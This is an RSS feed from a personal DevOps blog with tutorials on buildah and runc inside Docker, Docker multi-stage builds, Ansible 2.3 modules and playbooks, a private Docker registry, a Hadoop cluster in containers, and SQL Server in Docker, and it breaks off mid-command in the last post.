GoogLinux.comThoughts, stories and ideas to share :)http://www.googlinux.com/Ghost 0.9Tue, 12 Sep 2017 22:27:02 GMT60Creating a OCI Container within Docker Container<p><img src="http://www.googlinux.com/content/images/2017/09/bloglaurel-docker-containerd.jpg" alt="**"></p> <p><strong><em>This title sounds funny, but I couldn't find a better one. :)</em></strong></p> <p>As OCI 1.0 specification was released it no longer remains as just Docker Container, it is now Linux Container. There are tools being built around OCI specification like <code>buildah</code>, <code>cri-o</code>, <code>skopeo</code> and lot more to come. </p> <p>I will</p>http://www.googlinux.com/creating-a-oci-container-within-docker-container/416dff1d-8726-4bc2-b711-ccf932ee99dfDockerDevOpsOCISwapnil JainTue, 12 Sep 2017 22:24:47 GMT<p><img src="http://www.googlinux.com/content/images/2017/09/bloglaurel-docker-containerd.jpg" alt="**"></p> <p><strong><em>This title sounds funny, but I couldn't find a better one. :)</em></strong></p> <p>As OCI 1.0 specification was released it no longer remains as just Docker Container, it is now Linux Container. There are tools being built around OCI specification like <code>buildah</code>, <code>cri-o</code>, <code>skopeo</code> and lot more to come. </p> <p>I will be creating a ubuntu container using docker and will create alpine container within this ubuntu container using <code>buildah</code> and <code>runc</code>. The fun part is there is no docker or oci daemon running withing ubuntu container.</p> <blockquote> <p><code>buildah</code> is a tool under project atomic which facilitates building OCI container images. <code>runc</code> is a CLI tool for spawning and running containers according to the OCI specification.</p> </blockquote> <pre><code>$ docker run -it --privileged -v libcon:/var/lib/containers/storage -v runcon:/var/run/containers/storage ubuntu bash root@2faae578f9cf:/# </code></pre> <p>This will create a privileged ubuntu container. We are bypassing the container layer for <code>/var/lib/containers/storage</code> and <code>/var/run/containers/storage</code> folders as we will not be able to create another container layer with this layer.</p> <p>Prior to installing <code>buildah</code>, I need to install some packages, use the following commands in the Ubuntu container.</p> <pre><code>apt-get update apt-get -y install software-properties-common add-apt-repository -y ppa:alexlarsson/flatpak add-apt-repository -y ppa:gophers/archive apt-add-repository -y ppa:projectatomic/ppa apt-get update apt-get -y install bats btrfs-tools git libapparmor-dev libdevmapper-dev libglib2.0-dev libgpgme11-dev libostree-dev libseccomp-dev libselinux1-dev skopeo-containers go-md2man apt-get -y install golang-1.8 </code></pre> <p>Then to build <code>buildah</code> on Ubuntu follow the steps...</p> <pre><code>mkdir ~/buildah cd ~/buildah export GOPATH=`pwd` git clone https://github.com/projectatomic/buildah ./src/github.com/projectatomic/buildah cd ./src/github.com/projectatomic/buildah PATH=/usr/lib/go-1.8/bin:$PATH make runc all TAGS="apparmor seccomp" make install buildah --help </code></pre> <p><code>buildah</code> uses <code>runc</code> to run commands in a container so we need to make sure <code>runc</code> is accessible.</p> <pre><code>mkdir /etc/containers cp ~/buildah/src/github.com/projectatomic/buildah/tests/policy.json /etc/containers/ cp ~/buildah/src/github.com/opencontainers/runc/runc /usr/local/bin/ </code></pre> <h6 id="soitstimeforsomefuncreateanewworkingcontainerfromaspecifiedimage">So it's time for some fun. Create a new working container, from a specified image.</h6> <pre><code>root@2faae578f9cf:~# buildah from alpine Getting image source signatures Copying blob sha256:88286f41530e93dffd4b964e1db22ce4939fffa4a4c665dab8591fbab03d4926 1.90 MiB / 1.90 MiB [=========================================================] Copying config sha256:7328f6f8b41890597575cbaadc884e7386ae0acc53b747401ebce5cf0d624560 0 B / 1.48 KiB [--------------------------------------------------------------] Writing manifest to image destination Storing signatures 1.48 KiB / 1.48 KiB [=========================================================]alpine-working-container root@2faae578f9cf:~# </code></pre> <h6 id="listtheworkingcontainersandtheirbaseimages">List the working containers and their base images.</h6> <pre><code>root@2faae578f9cf:~# buildah containers CONTAINER ID BUILDER IMAGE ID IMAGE NAME CONTAINER NAME 1f3daef44a3d * abf11ad2ca3c docker.io/library/alpine:latest alpine-working-container root@2faae578f9cf:~# </code></pre> <h6 id="runacommandinsideofthecontainer">Run a command inside of the container.</h6> <pre><code>root@2faae578f9cf:~# buildah run --tty alpine-working-container sh / # ps aux PID USER TIME COMMAND 1 root 0:00 sh 7 root 0:00 ps aux / # cat /etc/alpine-release 3.6.2 / # </code></pre> <p>It just has started and there's more to explore. Stay tuned. :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Docker: Multi-stage builds<p><img src="http://www.googlinux.com/content/images/2017/07/AAEAAQAAAAAAAAe1AAAAJDg2MzJhNmVmLTllMjktNGQ1YS05OWQ5LTYzODNjMDQ4NTU1Mg.jpg" alt=""></p> <p><strong><em>Multi-stage builds is a new feature in Docker 17.05, and they will be exciting to anyone who has struggled to optimise Dockerfiles while keeping them easy to read and maintain.</em></strong></p> <p>One of the most challenging things about building images is keeping the image size down. Each instruction in the</p>http://www.googlinux.com/docker-multi-stage-builds/05e853e1-70b6-4079-98d1-2ce70ad41c10DockerDevOpsSwapnil JainMon, 24 Jul 2017 14:38:03 GMT<p><img src="http://www.googlinux.com/content/images/2017/07/AAEAAQAAAAAAAAe1AAAAJDg2MzJhNmVmLTllMjktNGQ1YS05OWQ5LTYzODNjMDQ4NTU1Mg.jpg" alt=""></p> <p><strong><em>Multi-stage builds is a new feature in Docker 17.05, and they will be exciting to anyone who has struggled to optimise Dockerfiles while keeping them easy to read and maintain.</em></strong></p> <p>One of the most challenging things about building images is keeping the image size down. Each instruction in the Dockerfile adds a layer to the image, and you need to remember to clean up any artifacts you don’t need before moving on to the next layer. To write a really efficient Dockerfile, you have traditionally needed to employ shell tricks and other logic to keep the layers as small as possible and to ensure that each layer has the artifacts it needs from the previous layer and nothing else.</p> <h5 id="thisishowweusedtodo">This is how we used to do...</h5> <p>This is a simple go app to print "Hello Docker!".</p> <pre><code>[root@node1 multistage]# cat app.go package main import "fmt" func main() { fmt.Println("Hello Docker!") } </code></pre> <p>And heres our <code>Dockerfile</code> to build and run this application.</p> <pre><code>[root@node1 multistage]# cat Dockerfile FROM golang:1.7.3 COPY app.go . RUN go build -o app app.go CMD ["./app"] root@ubuntu:~/multistage# </code></pre> <p>Lets build this</p> <pre><code>[root@node1 multistage]# docker build . -t mygoapp Sending build context to Docker daemon 3.072kBStep 1/4 : FROM golang:1.7.3 1.7.3: Pulling from library/golang 386a066cd84a: Pull complete 75ea84187083: Pull complete 88b459c9f665: Pull complete a31e17eb9485: Pull complete 457559cc1d69: Pull complete 47fe51a74a06: Pull complete 08dacccac43c: Pull complete Digest: sha256:340212e9c5d062f3bfe58ff02768da70234ea734bd022a357ee6be2a6d963505Status: Downloaded newer image for golang:1.7.3 ---&gt; ef15416724f6Step 2/4 : COPY app.go . ---&gt; c50e64d59b04 Removing intermediate container 8198404914c9 Step 3/4 : RUN go build -o app app.go ---&gt; Running in 685898ecf74f ---&gt; 739f7b2a47c7 Removing intermediate container 685898ecf74f Step 4/4 : CMD ./app ---&gt; Running in 66334e6ca5d8 ---&gt; ab1152b774ee Removing intermediate container 66334e6ca5d8 Successfully built ab1152b774ee Successfully tagged mygoapp:latest [root@node1 multistage]# [root@node1 multistage]# docker run mygoapp Hello Docker! [root@node1 multistage]# </code></pre> <p>Check the size of image, its 674MB</p> <pre><code>[root@node1 multistage]# docker image ls REPOSITORY TAG IMAGE ID CREATED SIZE mygoapp latest efdc2b679aa6 15 seconds ago 674MB golang 1.7.3 ef15416724f6 8 months ago 672MB [root@node1 multistage]# </code></pre> <h5 id="thisishowwewouldlovetodo">This is how we would love to do...</h5> <p>With multi-stage builds, you use multiple <code>FROM</code> statements in your <code>Dockerfile</code>. Each <code>FROM</code> instruction can use a different base, and each of them begins a new stage of the build. You can selectively copy artifacts from one stage to another, leaving behind everything you don’t want in the final image. To show how this works, Let’s adapt the <code>Dockerfile</code> from the previous section to use multi-stage builds.</p> <pre><code>[root@node1 multistage]# cat Dockerfile.multi FROM golang:1.7.3 AS builder COPY app.go . RUN go build -o app app.go FROM alpine:latest COPY --from=builder /go/app . CMD ["./app"] </code></pre> <p>You only need the single <code>Dockerfile</code>. You don’t need a separate build script, either. Just run <code>docker build</code>.</p> <pre><code>[root@node1 multistage]# docker build . -f Dockerfile.multi -t mygoapp:multi Sending build context to Docker daemon 4.096kB Step 1/6 : FROM golang:1.7.3 AS builder ---&gt; ef15416724f6 Step 2/6 : COPY app.go . ---&gt; Using cache ---&gt; 15f89542f308 Step 3/6 : RUN go build -o app app.go ---&gt; Using cache ---&gt; 09d91ef7f1a1 Step 4/6 : FROM alpine:latest latest: Pulling from library/alpine 88286f41530e: Pull complete Digest: sha256:1072e499f3f655a032e88542330cf75b02e7bdf673278f701d7ba61629ee3ebe Status: Downloaded newer image for alpine:latest ---&gt; 7328f6f8b418 Step 5/6 : COPY --from=builder /go/app . ---&gt; adee51a03a34 Removing intermediate container de57adb9658f Step 6/6 : CMD ./app ---&gt; Running in 42c17df73436 ---&gt; 40b371535a83 Removing intermediate container 42c17df73436 Successfully built 40b371535a83 Successfully tagged mygoapp:multi [root@node1 multistage]# </code></pre> <p>The second <code>FROM</code> instruction starts a new build stage with the <code>alpine:latest</code> image as its base. The <code>COPY --from=builder</code> line copies just the built artifact from the previous stage into this new stage. The Go SDK and any intermediate artifacts are left behind, and not saved in the final image. The end result is a tiny production image.</p> <pre><code>[root@node1 multistage]# docker image ls REPOSITORY TAG IMAGE ID CREATED SIZE mygoapp multi 40b371535a83 About a minute ago 5.6MB mygoapp latest efdc2b679aa6 5 minutes ago 674MB alpine latest 7328f6f8b418 3 weeks ago 3.97MB golang 1.7.3 ef15416724f6 8 months ago 672MB [root@node1 multistage]# </code></pre> <p>Notice the difference in size. :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Ansible 2.3: New Modules<p><img src="http://www.googlinux.com/content/images/2017/04/Ansible-2-3-Blog-Header.png" alt=""> <strong><em>Soon after Ansible turned five, version 2.3 was released. There are a lot of new features in this version specifically related to networking. Like, Persistent connections framework, network_cli connection plugin and netconf connection plugin.</em></strong></p> <p>There are 280+ new modules available in Ansible 2.3. Below is the list</p>http://www.googlinux.com/ansible-2-3-new-modules/ccf58c63-a044-496d-91b1-22d52a3c970fAnsibleDevOpsSwapnil JainMon, 17 Apr 2017 11:52:58 GMT<p><img src="http://www.googlinux.com/content/images/2017/04/Ansible-2-3-Blog-Header.png" alt=""> <strong><em>Soon after Ansible turned five, version 2.3 was released. There are a lot of new features in this version specifically related to networking. Like, Persistent connections framework, network_cli connection plugin and netconf connection plugin.</em></strong></p> <p>There are 280+ new modules available in Ansible 2.3. Below is the list of some exciting new modules which can help you to automate certain task and also decorate your playbooks.</p> <ul> <li><code>archive</code> - Creates a compressed archive of one or more files or trees.</li> </ul> <pre><code>- archive: path: /path/to/foo dest: /path/to/foo.tgz format: gz </code></pre> <blockquote> <p><mark>gz, bz2 &amp; zip are supported formats</mark></p> </blockquote> <ul> <li><code>openssl_privatekey</code> - Generate OpenSSL private keys.</li> </ul> <pre><code>- openssl_privatekey: path: /etc/ssl/private/googlinux.com.pem Size: 2048 type: DSA </code></pre> <ul> <li><code>openssl_publickey</code> - Generate an OpenSSL public key from its private key.</li> </ul> <pre><code>- openssl_publickey: path: /etc/ssl/public/googlinux.com.pem privatekey_path: /etc/ssl/private/googlinux.com.pem </code></pre> <ul> <li><code>openssl_csr</code> - Generate OpenSSL Certificate Signing Request (CSR)</li> </ul> <pre><code>- openssl_csr: path: /etc/ssl/csr/www.googlinux.com.csr privatekey_path: /etc/ssl/private/googlinux.com.pem commonname: www.googlinux.com </code></pre> <ul> <li><code>pacemaker_cluster</code> - Manage a pacemaker cluster</li> </ul> <pre><code>- name: Set cluster Online hosts: localhost gather_facts: no tasks: - name: get cluster state pacemaker_cluster: state=online </code></pre> <ul> <li><code>parted</code> - Configure block device partitions</li> </ul> <pre><code>- parted: device=/dev/sdb unit=MiB state=info register: sdb_info - parted: device: /dev/sdb number: ""{{ item.num }}"" state: absent with_items: - "{{ sdb_info.partitions }}" </code></pre> <ul> <li><code>wait_for_connection</code> Waits until remote system is reachable/usable. This is an better alternative for <code>wait_for</code> module.</li> </ul> <pre><code>- name: Wait 600 seconds for target connection to become reachable/usable wait_for_connection: - name: Wait 300 seconds, but only start checking after 60 seconds wait_for_connection: delay: 60 timeout: 300 </code></pre> <h5 id="ansibletowercanalsobemanagedusingaplaybookbelowaresomemodulesforansibletower">Ansible Tower can also be managed using a playbook :). Below are some modules for Ansible Tower</h5> <ul> <li><code>tower_credential</code> - create, update, or destroy Ansible Tower credential.</li> <li><code>tower_group</code> - create, update, or destroy Ansible Tower group. </li> <li><code>tower_host</code> - create, update, or destroy Ansible Tower host. </li> <li><code>tower_inventory</code> - create, update, or destroy Ansible Tower inventory. </li> <li><code>tower_job_cancel</code> - Cancel an Ansible Tower Job.</li> <li><code>tower_job_launch</code> - Launch an Ansible Job. </li> <li><code>tower_job_list</code> - List Ansible Tower jobs</li> <li><code>tower_job_template</code> - create, update, or destroy Ansible Tower job_template.</li> <li><code>tower_job_wait</code> - Wait for Ansible Tower job to finish. </li> <li><code>tower_label</code> - create, update, or destroy Ansible Tower label.</li> <li><code>tower_organization</code> - create, update, or destroy Ansible Tower organizations</li> <li><code>tower_project</code> - create, update, or destroy Ansible Tower projects</li> <li><code>tower_role</code> - create, update, or destroy Ansible Tower role. </li> <li><code>tower_team</code> - create, update, or destroy Ansible Tower team.</li> <li><code>tower_user</code> - create, update, or destroy Ansible Tower user.</li> </ul> <h5 id="lotofnewadditionsforwindowsaswell">Lot of new additions for Windows ^ ^ as well :)</h5> <ul> <li><code>win_disk_image</code> - Manage ISO/VHD/VHDX mounts on Windows hosts</li> <li><code>win_dns_client</code> - Configures DNS lookup on Windows hosts</li> <li><code>win_domain</code> - Ensures the existence of a Windows domain. </li> <li><code>win_domain_controller</code> - Manage domain controller/member server state for a Windows host</li> <li><code>win_domain_membership</code> - Manage domain/workgroup membership for a Windows host</li> <li><code>win_find</code> - return a list of files based on specific criteria </li> <li><code>win_msg</code> - Sends a message to logged in users on Windows hosts.</li> <li><code>win_path</code> - Manage Windows path environment variables</li> <li><code>win_psexec</code> - Runs commands (remotely) as another (privileged) user</li> <li><code>win_reg_stat</code> - returns information about a Windows registry key or property of a key</li> <li><code>win_region</code> - Set the region and format settings</li> <li><code>win_say</code> - Text to speech module for Windows to speak messages</li> <li><code>win_shortcut</code> - Manage shortcuts on Windows</li> <li><code>win_tempfile</code> - Creates temporary files and directories</li> </ul> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Ansible: Run play only on reachable host<p><img src="http://www.googlinux.com/content/images/2017/03/do407singapore.jpg" alt=""></p> <p>During one of my Ansible trainings in Singapore one candidate asked me, is there some way that we execute the play only on reachable hosts. She also insisted that the playbook should show no errors. Showing errors would report the Job as failed in Ansible Tower. So, finally we came</p>http://www.googlinux.com/ansible-run-play-only-on-reachable-host/58b836ed-5dd4-4585-92ed-cb7e7fb78967AnsibleDevOpsSwapnil JainThu, 23 Mar 2017 14:46:36 GMT<p><img src="http://www.googlinux.com/content/images/2017/03/do407singapore.jpg" alt=""></p> <p>During one of my Ansible trainings in Singapore one candidate asked me, is there some way that we execute the play only on reachable hosts. She also insisted that the playbook should show no errors. Showing errors would report the Job as failed in Ansible Tower. So, finally we came out with a solution and it worked really well. </p> <p><strong>Our First play would be to check reachable hosts, and create a new group of the reachable hosts.</strong></p> <pre><code>- name: check reachable hosts hosts: all gather_facts: no tasks: - command: ping -c1 {{ inventory_hostname }} delegate_to: localhost register: ping_result ignore_errors: yes - group_by: key=reachable when: ping_result|success </code></pre> <ul> <li>We use <code>command</code> module to ping a host and delegate the task to localhost</li> <li>using <code>group_by</code> module, if the host is reachable we add it to a new group called <code>reachable</code></li> </ul> <p><strong>Next play would be the one that you want to run only on reachable hosts.</strong></p> <pre><code>- name: your actual play hosts: reachable gather_facts: yes tasks: - debug: msg="this is {{ ansible_hostname }}" </code></pre> <p><em>happy ;)</em></p> <blockquote> <p>This playbook is also available on <a href="https://github.com/swapnil-linux/ansible/blob/master/play_on_reachable_host.yml">GitHub</a> </p> </blockquote> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Creating Private Docker Registry<p><img src="http://www.googlinux.com/content/images/2017/03/2016-21-07-private-containers.png" alt=""></p> <h2 id="aboutregistry">About Registry</h2> <p><strong><em>A registry is a repository of docker images. Docker by default points to Public Docker Registry which is also called as Docker Hub. <code>docker search</code> would list results from docker hub and more information about image is available on hub.docker.com</em></strong></p> <p>You can upload your docker images</p>http://www.googlinux.com/creating-private-docker-registry/4c514237-e0dc-42e3-90a9-e14b7ba5504fDockerDevOpsSwapnil JainWed, 08 Mar 2017 00:55:07 GMT<p><img src="http://www.googlinux.com/content/images/2017/03/2016-21-07-private-containers.png" alt=""></p> <h2 id="aboutregistry">About Registry</h2> <p><strong><em>A registry is a repository of docker images. Docker by default points to Public Docker Registry which is also called as Docker Hub. <code>docker search</code> would list results from docker hub and more information about image is available on hub.docker.com</em></strong></p> <p>You can upload your docker images on Docker Hub which would be available for public. You can also create your own registry if you don't want to make it public or want a it in your premises available privately for your organisation or development environment.</p> <h2 id="createregistry">Create Registry</h2> <p>This one-liner will deploy your own private docker registry.</p> <pre><code>docker run --name=docker-registry -d -v /opt/registry:/var/lib/registry:Z -p 5000:5000 registry </code></pre> <ul> <li><code>-d</code> : will demonize the container</li> <li><code>-v /opt/registry:/var/lib/registry:Z</code> : Will make <code>/var/lib/registry</code> folder persistent on your host at <code>/opt/registry</code> and <code>:Z</code> will set appropriate SELinux context on <code>/opt/registry</code></li> <li><code>-p 5000:5000</code> : will forward port 5000 from your host to port 5000 of your registry container.</li> </ul> <p><img src="http://www.googlinux.com/content/images/2017/03/Screenshot-2017-03-08-18-31-41.png" alt=""></p> <blockquote> <p>Note: This registry uses v2 APIs, so you will have to use Docker version 1.6.0+ to pull and push images.</p> </blockquote> <h2 id="testit">Test It</h2> <h4 id="createadockerfilewiththebelowcontent">Create a <code>Dockerfile</code> with the below content</h4> <pre><code>FROM docker.io/library/alpine CMD ["echo","Hello World!"] </code></pre> <h4 id="buildyourimageusingdockerbuild">Build your image using <code>docker build</code></h4> <pre><code>[root@localhost ~]# docker build -t localhost:5000/hello . Sending build context to Docker daemon 2.048 kB Step 1 : FROM docker.io/library/alpine ---&gt; 4a415e366388 Step 2 : CMD echo Hello World! ---&gt; Running in bda8cb469d6a ---&gt; 9d586b88dd82 Removing intermediate container bda8cb469d6a Successfully built 9d586b88dd82 </code></pre> <h4 id="letspushitusingdockerpush">Let's push it using <code>docker push</code></h4> <pre><code>[root@localhost ~]# docker push localhost:5000/hello The push refers to a repository [localhost:5000/hello] 23b9c7b43573: Pushed latest: digest: sha256:84767a295c57bfd0a43072240790f105b192d60fbd836cb1df12badb3a1b4cf0 size: 528 </code></pre> <p>We have created a persistent storage for our registry folder so you can see it in your /opt/registry folder.</p> <pre><code>[root@localhost ~]# ls -l /opt/registry/docker/registry/v2/repositories/ total 0 drwxr-xr-x. 5 root root 52 Mar 8 08:09 hello </code></pre> <p>Thats it :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Quickly deploy hadoop cluster using Docker<p><img src="http://www.googlinux.com/content/images/2017/01/linux-hadoop-docker.png" alt=""></p> <p>Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage.</p> <p><strong><em>Installing, configuring and adding new datanodes to</em></strong></p>http://www.googlinux.com/quickly-deploy-hadoop-cluster-using-docker/1fc2b6b5-a5a9-4c5e-a235-bc9d5425e70eDockerDevOpsHadoopSwapnil JainThu, 12 Jan 2017 07:03:57 GMT<p><img src="http://www.googlinux.com/content/images/2017/01/linux-hadoop-docker.png" alt=""></p> <p>Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage.</p> <p><strong><em>Installing, configuring and adding new datanodes to the hadoop cluster takes time. Deploying hadoop nodes as a container can be really quick. <mark>On a CentOS7 VM in Virtualbox, it took 9 seconds to bring up 1 YarnMaster, 1 NameNode and 3 DataNodes, yes just 9 seconds.</mark> The steps below demonstrates howto quickly deploy a hadoop cluster using docker.</em></strong></p> <p><img src="http://www.googlinux.com/content/images/2017/01/Screenshot-2017-01-12-11-43-31.png" alt=""></p> <h3 id="pulldockerimages">Pull Docker Images</h3> <p>These docker images are build using CentOS7 and Cloudera CHD 5.9</p> <pre><code>~# docker pull swapnillinux/cloudera-hadoop-namenode ~# docker pull swapnillinux/cloudera-hadoop-yarnmaster ~# docker pull swapnillinux/cloudera-hadoop-datanode </code></pre> <h3 id="createadockerbridgednetwork">Create a Docker Bridged Network</h3> <p>This step is optional but I strongly recommend creating a separate network for hadoop cluster.</p> <pre><code>~# docker network create hadoop </code></pre> <h3 id="createyarnmaster">Create Yarnmaster</h3> <pre><code>~# docker run -d --net hadoop --net-alias yarnmaster --name yarnmaster -h yarnmaster -p 8032:8032 -p 8088:8088 swapnillinux/cloudera-hadoop-yarnmaster </code></pre> <h3 id="createnamenode">Create Namenode</h3> <pre><code>~# docker run -d --net hadoop --net-alias namenode --name namenode -h namenode -p 8020:8020 swapnillinux/cloudera-hadoop-namenode </code></pre> <h3 id="createfirstdatanode">Create First Datanode</h3> <pre><code>~# docker run -d --net hadoop --net-alias datanode1 -h datanode1 --name datanode1 --link namenode --link yarnmaster swapnillinux/cloudera-hadoop-datanode </code></pre> <h3 id="creatingadditionaldatanodes">Creating additional Datanodes</h3> <p>You can keep on adding additional datanodes just change <code>--net-alias datanodeN</code> <code>-h datanodeN</code> <code>--name datanodeN</code></p> <pre><code>~# docker run -d --net hadoop --net-alias datanode2 -h datanode2 --name datanode2 --link namenode --link yarnmaster swapnillinux/cloudera-hadoop-datanode </code></pre> <h3 id="verify">Verify</h3> <p>open your browser pointing to <code>http://docker-host-ip:8088</code> and click on <mark><strong>Nodes</strong></mark></p> <blockquote> <p>replace <code>docker-host-ip</code> with IP Address of the linux box where you are running these containers.</p> </blockquote> <p><img src="http://www.googlinux.com/content/images/2017/01/Screenshot-2017-01-12-12-25-48.png" alt=""></p> <h3 id="runatest">Run A Test</h3> <p><strong>Login to Namenode</strong></p> <pre><code>[root@centos ~]# docker exec -it namenode bash [root@namenode /]# hadoop version Hadoop 2.6.0-cdh5.9.0 Subversion http://github.com/cloudera/hadoop -r 1c8ae0d951319fea693402c9f82449447fd27b07 Compiled by jenkins on 2016-10-21T08:10Z Compiled with protoc 2.5.0 From source with checksum 5448863f1e597b97d9464796b0a451 This command was run using /usr/lib/hadoop/hadoop-common-2.6.0-cdh5.9.0.jar [root@namenode /]# </code></pre> <p><strong>Run a PI calculation test</strong></p> <pre><code>[root@namenode /]# hadoop jar /usr/lib/hadoop-mapreduce/hadoop-mapreduce-examples.jar pi 10 10 Number of Maps = 10 Samples per Map = 10 Wrote input for Map #0 Wrote input for Map #1 Wrote input for Map #2 Wrote input for Map #3 Wrote input for Map #4 Wrote input for Map #5 Wrote input for Map #6 Wrote input for Map #7 Wrote input for Map #8 Wrote input for Map #9 Starting Job 17/01/12 07:00:49 INFO client.RMProxy: Connecting to ResourceManager at yarnmaster/172.18.0.3:8032 17/01/12 07:00:50 INFO input.FileInputFormat: Total input paths to process : 10 17/01/12 07:00:50 INFO mapreduce.JobSubmitter: number of splits:10 17/01/12 07:00:50 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1484201581901_0001 17/01/12 07:00:51 INFO impl.YarnClientImpl: Submitted application application_1484201581901_0001 17/01/12 07:00:51 INFO mapreduce.Job: The url to track the job: http://yarnmaster:8088/proxy/application_1484201581901_0001/ 17/01/12 07:00:51 INFO mapreduce.Job: Running job: job_1484201581901_0001 17/01/12 07:01:04 INFO mapreduce.Job: Job job_1484201581901_0001 running in uber mode : false 17/01/12 07:01:04 INFO mapreduce.Job: map 0% reduce 0% 17/01/12 07:01:36 INFO mapreduce.Job: map 10% reduce 0% 17/01/12 07:01:38 INFO mapreduce.Job: map 20% reduce 0% 17/01/12 07:01:58 INFO mapreduce.Job: map 20% reduce 7% 17/01/12 07:02:05 INFO mapreduce.Job: map 50% reduce 7% 17/01/12 07:02:06 INFO mapreduce.Job: map 60% reduce 7% 17/01/12 07:02:07 INFO mapreduce.Job: map 100% reduce 20% 17/01/12 07:02:09 INFO mapreduce.Job: map 100% reduce 100% 17/01/12 07:02:09 INFO mapreduce.Job: Job job_1484201581901_0001 completed successfully 17/01/12 07:02:10 INFO mapreduce.Job: Counters: 49 File System Counters FILE: Number of bytes read=226 FILE: Number of bytes written=1300574 FILE: Number of read operations=0 FILE: Number of large read operations=0 FILE: Number of write operations=0 HDFS: Number of bytes read=2620 HDFS: Number of bytes written=215 HDFS: Number of read operations=43 HDFS: Number of large read operations=0 HDFS: Number of write operations=3 Job Counters Launched map tasks=10 Launched reduce tasks=1 Data-local map tasks=10 Total time spent by all maps in occupied slots (ms)=528262 Total time spent by all reduces in occupied slots (ms)=30384 Total time spent by all map tasks (ms)=528262 Total time spent by all reduce tasks (ms)=30384 Total vcore-seconds taken by all map tasks=528262 Total vcore-seconds taken by all reduce tasks=30384 Total megabyte-seconds taken by all map tasks=540940288 Total megabyte-seconds taken by all reduce tasks=31113216 Map-Reduce Framework Map input records=10 Map output records=20 Map output bytes=180 Map output materialized bytes=280 Input split bytes=1440 Combine input records=0 Combine output records=0 Reduce input groups=2 Reduce shuffle bytes=280 Reduce input records=20 Reduce output records=0 Spilled Records=40 Shuffled Maps =10 Failed Shuffles=0 Merged Map outputs=10 GC time elapsed (ms)=6213 CPU time spent (ms)=4740 Physical memory (bytes) snapshot=2266828800 Virtual memory (bytes) snapshot=28556414976 Total committed heap usage (bytes)=1741398016 Shuffle Errors BAD_ID=0 CONNECTION=0 IO_ERROR=0 WRONG_LENGTH=0 WRONG_MAP=0 WRONG_REDUCE=0 File Input Format Counters Bytes Read=1180 File Output Format Counters Bytes Written=97 Job Finished in 81.108 seconds Estimated value of Pi is 3.20000000000000000000 [root@namenode /]# </code></pre> <p><img src="http://www.googlinux.com/content/images/2017/01/Screenshot-2017-01-12-12-32-23.png" alt=""></p> <p>Enjoy :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Microsoft SQL Server as a Docker Container<p><img src="http://www.googlinux.com/content/images/2017/03/sql-server-on-linux.png" alt=""></p> <p><strong><em>Nobody could have ever imagined Microsoft SQL Server running on Linux. I appreciate the foresight of Satya Nadella, CEO Microsoft embracing Linux and OpenSource.</em></strong></p> <p>Now as Microsoft SQL Server vNext CTP 1.1 is available for Ubuntu, RHEL7 &amp; CentOS7, how about running it as a container.</p> <p>To run SQL</p>http://www.googlinux.com/microsoft-sql-server-as-a-docker-container/0f194839-c8b3-4ee8-bb28-f5ec303b17f8DockerDevOpsSwapnil JainWed, 21 Dec 2016 13:32:27 GMT<p><img src="http://www.googlinux.com/content/images/2017/03/sql-server-on-linux.png" alt=""></p> <p><strong><em>Nobody could have ever imagined Microsoft SQL Server running on Linux. I appreciate the foresight of Satya Nadella, CEO Microsoft embracing Linux and OpenSource.</em></strong></p> <p>Now as Microsoft SQL Server vNext CTP 1.1 is available for Ubuntu, RHEL7 &amp; CentOS7, how about running it as a container.</p> <p>To run SQL Server vNext CTP 1.1, you need Minimum of 4 GB of RAM on your host.</p> <p><strong>Pulling Image</strong></p> <p>Use Docker pull command to pull the image from docker hub.</p> <pre><code>~# docker pull swapnillinux/mssql </code></pre> <p><strong>Creating Container</strong></p> <ul> <li>run - create &amp; start container</li> <li>--name - name the container as <code>mymssql</code></li> <li>-p 1433:1433 - forward port 1433 from your host to 1433 of container</li> <li>-d - Run container in background using Docker image <code>swapnillinux/mssql</code></li> </ul> <pre><code>~# docker run --name=mymssql -p 1433:1433 -d swapnillinux/mssql </code></pre> <p>Check Status using <code>docker ps</code> command</p> <pre><code>~# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ec4b65b5d6ec swapnillinux/mssql "/opt/mssql/bin/sqlse" 22 seconds ago Up 21 seconds 0.0.0.0:1433-&gt;1433/tcp mymssql </code></pre> <p>Check some logs of your container using <code>docker logs</code> command</p> <pre><code>~# docker logs mymssql This is an evaluation version. There are [174] days left in the evaluation period. 2016-12-21 12:56:24.72 Server Microsoft SQL Server vNext (CTP1.1) - 14.0.100.187 (X64) Dec 10 2016 02:51:11 Copyright (C) 2016 Microsoft Corporation. All rights reserved. on Linux (CentOS Linux 7 (Core)) ... ... ... ... ... 2016-12-21 12:56:27.26 spid6s Polybase feature disabled. 2016-12-21 12:56:27.26 spid6s Clearing tempdb database. 2016-12-21 12:56:27.85 spid6s Starting up database 'tempdb'. 2016-12-21 12:56:28.14 spid6s The tempdb database has 1 data file(s). 2016-12-21 12:56:28.15 spid20s The Service Broker endpoint is in disabled or stopped state. 2016-12-21 12:56:28.16 spid20s The Database Mirroring endpoint is in disabled or stopped state. 2016-12-21 12:56:28.18 spid20s Service Broker manager has started. 2016-12-21 12:56:28.26 spid5s Recovery is complete. This is an informational message only. No user action is required. </code></pre> <p>Looks like its up and running.</p> <p><strong>Now Test it</strong></p> <p>Use SQL Server tools on Linux to connect to MSSQL server.</p> <p>on RHEL or CentOS</p> <pre><code>~# wget https://packages.microsoft.com/config/rhel/7/prod.repo -O /etc/yum.repos.d/msprod.repo ~# yum 